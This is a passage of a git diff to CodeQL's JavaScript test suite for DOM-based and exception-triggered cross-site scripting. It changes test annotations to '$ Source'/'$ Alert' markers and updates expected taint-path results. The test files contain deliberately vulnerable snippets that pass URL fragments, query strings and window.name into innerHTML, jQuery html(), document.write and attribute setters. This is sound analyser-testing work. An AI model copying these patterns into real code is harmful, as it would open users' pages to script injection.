$("body").append(location); // $ Alert } function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } @@ -293,74 +277,74 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search - $.jGrowl(target); // NOT OK + var target = document.location.search // $ Source + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. (this is a jQuery object) + var target = document.location.search // $ Source + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - this is a DOM-node + this.html(target); // OK - this is a DOM-node - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; @@ -368,81 +352,80 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); } function test() { - var target = document.location.search + var target = document.location.search // $ Source - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); - target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + target.taint3 = document.location.search; // $ Source + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { - var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + var payload = window.location.hash.substr(1); // $ Source + document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source - new Element("div"); // OK - new Element("div", {text: source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } @@ -450,63 +433,63 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); } function nonGlobalSanitizer() { - var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + var target = document.location.search // $ Source + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js @@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,12 +17,12 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index f35e603228d6..866636f07c18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,15 +1,15 @@ function test() { - let tainted = document.location.search; + let tainted = document.location.search; // $ Source - $("
    " + tainted + "
    "); // NOT OK - $(`
    ${tainted}
    `); // NOT OK - $("
    ".concat(tainted).concat("
    ")); // NOT OK - $(["
    ", tainted, "
    "].join()); // NOT OK + $("
    " + tainted + "
    "); // $ Alert + $(`
    ${tainted}
    `); // $ Alert + $("
    ".concat(tainted).concat("
    ")); // $ Alert + $(["
    ", tainted, "
    "].join()); // $ Alert - $("
    "); // NOT OK - $(`
    `); // NOT OK - $("
    ")); // NOT OK - $(["
    "].join()); // NOT OK + $("
    "); // $ Alert + $(`
    `); // $ Alert + $("
    ")); // $ Alert + $(["
    "].join()); // $ Alert function indirection1(attrs) { return '
    ' + content + '
    '; @@ -17,6 +17,6 @@ function test() { function indirection2(attrs) { return '
    '.concat(content)).concat('
    '); } - $(indirection1(document.location.search.attrs)); // NOT OK - $(indirection2(document.location.search.attrs)); // NOT OK + $(indirection1(document.location.search.attrs)); // $ Alert + $(indirection2(document.location.search.attrs)); // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js index 59f9866daac0..5d2b25bed092 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js @@ -1,5 +1,5 @@ function test(elt) { - var tainted = document.location.search.substring(1); - WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); - WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); + var tainted = document.location.search.substring(1); // $ Source + WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert + WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql deleted file mode 100644 index ec505e62e171..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ExceptionXssQuery as ExceptionXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected index a862c47907c3..350f7bf5431c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected @@ -1,3 +1,97 @@ +#select +| ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:11:18:11:33 | ajv.errorsText() | JSON schema validation error | +| ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:24:18:24:26 | val.error | JSON schema validation error | +| exception-xss.js:11:18:11:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:11:18:11:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:17:18:17:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:17:18:17:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:23:18:23:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:23:18:23:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:35:18:35:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:35:18:35:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:48:18:48:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:48:18:48:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:83:18:83:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:83:18:83:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:91:18:91:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:91:18:91:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:97:18:97:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:97:18:97:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:107:18:107:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:107:18:107:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:119:12:119:28 | "Exception: " + e | exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:119:12:119:28 | "Exception: " + e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:117:11:117:23 | req.params.id | Exception text | +| exception-xss.js:130:18:130:18 | e | exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:130:18:130:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:125:45:125:68 | documen ... .search | Exception text | +| exception-xss.js:138:19:138:23 | error | exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:138:19:138:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:136:10:136:22 | req.params.id | Exception text | +| exception-xss.js:149:18:149:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:149:18:149:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | +| exception-xss.js:155:18:155:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:155:18:155:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | +| exception-xss.js:175:18:175:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:175:18:175:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | +| exception-xss.js:182:19:182:23 | error | exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:182:19:182:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:180:10:180:22 | req.params.id | Exception text | +edges +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:9:11:9:13 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:15:9:15:11 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:21:11:21:13 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:33:19:33:21 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:46:16:46:18 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:81:16:81:18 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:89:11:89:13 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:95:12:95:14 | foo | provenance | | +| exception-xss.js:2:6:2:28 | foo | exception-xss.js:102:12:102:14 | foo | provenance | | +| exception-xss.js:2:12:2:28 | document.location | exception-xss.js:2:6:2:28 | foo | provenance | | +| exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | provenance | | +| exception-xss.js:9:11:9:13 | foo | exception-xss.js:10:11:10:11 | e | provenance | Config | +| exception-xss.js:10:11:10:11 | e | exception-xss.js:11:18:11:18 | e | provenance | | +| exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | exception-xss.js:16:11:16:11 | e | provenance | | +| exception-xss.js:15:9:15:11 | foo | exception-xss.js:4:17:4:17 | x | provenance | | +| exception-xss.js:15:9:15:11 | foo | exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | provenance | Config | +| exception-xss.js:16:11:16:11 | e | exception-xss.js:17:18:17:18 | e | provenance | | +| exception-xss.js:21:11:21:13 | foo | exception-xss.js:21:11:21:21 | foo + "bar" | provenance | | +| exception-xss.js:21:11:21:21 | foo + "bar" | exception-xss.js:22:11:22:11 | e | provenance | Config | +| exception-xss.js:22:11:22:11 | e | exception-xss.js:23:18:23:18 | e | provenance | | +| exception-xss.js:33:11:33:22 | ["bar", foo] [1] | exception-xss.js:34:11:34:11 | e | provenance | Config | +| exception-xss.js:33:19:33:21 | foo | exception-xss.js:33:11:33:22 | ["bar", foo] [1] | provenance | | +| exception-xss.js:34:11:34:11 | e | exception-xss.js:35:18:35:18 | e | provenance | | +| exception-xss.js:38:16:38:16 | x | exception-xss.js:39:9:39:9 | x | provenance | | +| exception-xss.js:39:9:39:9 | x | exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | provenance | Config | +| exception-xss.js:39:9:39:9 | x | exception-xss.js:41:17:41:17 | x | provenance | | +| exception-xss.js:41:17:41:17 | x | exception-xss.js:42:9:42:9 | x | provenance | | +| exception-xss.js:42:9:42:9 | x | exception-xss.js:4:17:4:17 | x | provenance | | +| exception-xss.js:42:9:42:9 | x | exception-xss.js:42:3:42:10 | exceptional return of inner(x) | provenance | Config | +| exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | exception-xss.js:47:11:47:11 | e | provenance | | +| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:38:16:38:16 | x | provenance | | +| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | provenance | Config | +| exception-xss.js:46:16:46:18 | foo | exception-xss.js:46:8:46:18 | "bar" + foo | provenance | | +| exception-xss.js:47:11:47:11 | e | exception-xss.js:48:18:48:18 | e | provenance | | +| exception-xss.js:74:28:74:28 | x | exception-xss.js:75:10:75:10 | x | provenance | | +| exception-xss.js:75:10:75:10 | x | exception-xss.js:4:17:4:17 | x | provenance | | +| exception-xss.js:75:10:75:10 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | provenance | Config | +| exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | exception-xss.js:82:11:82:11 | e | provenance | | +| exception-xss.js:81:16:81:18 | foo | exception-xss.js:74:28:74:28 | x | provenance | | +| exception-xss.js:81:16:81:18 | foo | exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | provenance | Config | +| exception-xss.js:82:11:82:11 | e | exception-xss.js:83:18:83:18 | e | provenance | | +| exception-xss.js:89:11:89:13 | foo | exception-xss.js:89:11:89:26 | foo.match(/foo/) | provenance | | +| exception-xss.js:89:11:89:26 | foo.match(/foo/) | exception-xss.js:90:11:90:11 | e | provenance | Config | +| exception-xss.js:90:11:90:11 | e | exception-xss.js:91:18:91:18 | e | provenance | | +| exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | exception-xss.js:96:11:96:11 | e | provenance | Config | +| exception-xss.js:95:12:95:14 | foo | exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | provenance | | +| exception-xss.js:96:11:96:11 | e | exception-xss.js:97:18:97:18 | e | provenance | | +| exception-xss.js:102:12:102:14 | foo | exception-xss.js:106:11:106:11 | e | provenance | Config | +| exception-xss.js:106:11:106:11 | e | exception-xss.js:107:18:107:18 | e | provenance | | +| exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:118:11:118:11 | e | provenance | Config | +| exception-xss.js:118:11:118:11 | e | exception-xss.js:119:28:119:28 | e | provenance | | +| exception-xss.js:119:28:119:28 | e | exception-xss.js:119:12:119:28 | "Exception: " + e | provenance | | +| exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:128:11:128:52 | session ... ssion') | provenance | | +| exception-xss.js:128:11:128:52 | session ... ssion') | exception-xss.js:129:11:129:11 | e | provenance | Config | +| exception-xss.js:129:11:129:11 | e | exception-xss.js:130:18:130:18 | e | provenance | | +| exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:136:26:136:30 | error | provenance | Config | +| exception-xss.js:136:26:136:30 | error | exception-xss.js:138:19:138:23 | error | provenance | | +| exception-xss.js:146:6:146:35 | foo | exception-xss.js:148:33:148:35 | foo | provenance | | +| exception-xss.js:146:6:146:35 | foo | exception-xss.js:153:8:153:10 | foo | provenance | | +| exception-xss.js:146:6:146:35 | foo | exception-xss.js:174:31:174:33 | foo | provenance | | +| exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:146:6:146:35 | foo | provenance | | +| exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | exception-xss.js:148:55:148:55 | e | provenance | | +| exception-xss.js:148:33:148:35 | foo | exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | provenance | Config | +| exception-xss.js:148:55:148:55 | e | exception-xss.js:149:18:149:18 | e | provenance | | +| exception-xss.js:153:8:153:10 | foo | exception-xss.js:154:11:154:11 | e | provenance | Config | +| exception-xss.js:154:11:154:11 | e | exception-xss.js:155:18:155:18 | e | provenance | | +| exception-xss.js:170:17:170:23 | tainted | exception-xss.js:171:11:171:17 | tainted | provenance | | +| exception-xss.js:174:2:174:44 | new Pro ... solve)) [PromiseError] | exception-xss.js:174:53:174:53 | e | provenance | | +| exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | exception-xss.js:174:2:174:44 | new Pro ... solve)) [PromiseError] | provenance | | +| exception-xss.js:174:31:174:33 | foo | exception-xss.js:170:17:170:23 | tainted | provenance | | +| exception-xss.js:174:31:174:33 | foo | exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | provenance | Config | +| exception-xss.js:174:53:174:53 | e | exception-xss.js:175:18:175:18 | e | provenance | | +| exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:180:26:180:30 | error | provenance | Config | +| exception-xss.js:180:26:180:30 | error | exception-xss.js:182:19:182:23 | error | provenance | | nodes | ajv.js:11:18:11:33 | ajv.errorsText() | semmle.label | ajv.errorsText() | | ajv.js:24:18:24:26 | val.error | semmle.label | val.error | @@ -79,81 +173,6 @@ nodes | exception-xss.js:180:10:180:22 | req.params.id | semmle.label | req.params.id | | exception-xss.js:180:26:180:30 | error | semmle.label | error | | exception-xss.js:182:19:182:23 | error | semmle.label | error | -edges -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:9:11:9:13 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:15:9:15:11 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:21:11:21:13 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:33:19:33:21 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:46:16:46:18 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:81:16:81:18 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:89:11:89:13 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:95:12:95:14 | foo | provenance | | -| exception-xss.js:2:6:2:28 | foo | exception-xss.js:102:12:102:14 | foo | provenance | | -| exception-xss.js:2:12:2:28 | document.location | exception-xss.js:2:6:2:28 | foo | provenance | | -| exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | provenance | | -| exception-xss.js:9:11:9:13 | foo | exception-xss.js:10:11:10:11 | e | provenance | Config | -| exception-xss.js:10:11:10:11 | e | exception-xss.js:11:18:11:18 | e | provenance | | -| exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | exception-xss.js:16:11:16:11 | e | provenance | | -| exception-xss.js:15:9:15:11 | foo | exception-xss.js:4:17:4:17 | x | provenance | | -| exception-xss.js:15:9:15:11 | foo | exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | provenance | Config | -| exception-xss.js:16:11:16:11 | e | exception-xss.js:17:18:17:18 | e | provenance | | -| exception-xss.js:21:11:21:13 | foo | exception-xss.js:21:11:21:21 | foo + "bar" | provenance | | -| exception-xss.js:21:11:21:21 | foo + "bar" | exception-xss.js:22:11:22:11 | e | provenance | Config | -| exception-xss.js:22:11:22:11 | e | exception-xss.js:23:18:23:18 | e | provenance | | -| exception-xss.js:33:11:33:22 | ["bar", foo] [1] | exception-xss.js:34:11:34:11 | e | provenance | Config | -| exception-xss.js:33:19:33:21 | foo | exception-xss.js:33:11:33:22 | ["bar", foo] [1] | provenance | | -| exception-xss.js:34:11:34:11 | e | exception-xss.js:35:18:35:18 | e | provenance | | -| exception-xss.js:38:16:38:16 | x | exception-xss.js:39:9:39:9 | x | provenance | | -| exception-xss.js:39:9:39:9 | x | exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | provenance | Config | -| exception-xss.js:39:9:39:9 | x | exception-xss.js:41:17:41:17 | x | provenance | | -| exception-xss.js:41:17:41:17 | x | exception-xss.js:42:9:42:9 | x | provenance | | -| exception-xss.js:42:9:42:9 | x | exception-xss.js:4:17:4:17 | x | provenance | | -| exception-xss.js:42:9:42:9 | x | exception-xss.js:42:3:42:10 | exceptional return of inner(x) | provenance | Config | -| exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | exception-xss.js:47:11:47:11 | e | provenance | | -| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:38:16:38:16 | x | provenance | | -| exception-xss.js:46:8:46:18 | "bar" + foo | exception-xss.js:46:3:46:19 | exceptional return of deep("bar" + foo) | provenance | Config | -| exception-xss.js:46:16:46:18 | foo | exception-xss.js:46:8:46:18 | "bar" + foo | provenance | | -| exception-xss.js:47:11:47:11 | e | exception-xss.js:48:18:48:18 | e | provenance | | -| exception-xss.js:74:28:74:28 | x | exception-xss.js:75:10:75:10 | x | provenance | | -| exception-xss.js:75:10:75:10 | x | exception-xss.js:4:17:4:17 | x | provenance | | -| exception-xss.js:75:10:75:10 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | provenance | Config | -| exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | exception-xss.js:82:11:82:11 | e | provenance | | -| exception-xss.js:81:16:81:18 | foo | exception-xss.js:74:28:74:28 | x | provenance | | -| exception-xss.js:81:16:81:18 | foo | exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | provenance | Config | -| exception-xss.js:82:11:82:11 | e | exception-xss.js:83:18:83:18 | e | provenance | | -| exception-xss.js:89:11:89:13 | foo | exception-xss.js:89:11:89:26 | foo.match(/foo/) | provenance | | -| exception-xss.js:89:11:89:26 | foo.match(/foo/) | exception-xss.js:90:11:90:11 | e | provenance | Config | -| exception-xss.js:90:11:90:11 | e | exception-xss.js:91:18:91:18 | e | provenance | | -| exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | exception-xss.js:96:11:96:11 | e | provenance | Config | -| exception-xss.js:95:12:95:14 | foo | exception-xss.js:95:11:95:22 | [foo, "bar"] [0] | provenance | | -| exception-xss.js:96:11:96:11 | e | exception-xss.js:97:18:97:18 | e | provenance | | -| exception-xss.js:102:12:102:14 | foo | exception-xss.js:106:11:106:11 | e | provenance | Config | -| exception-xss.js:106:11:106:11 | 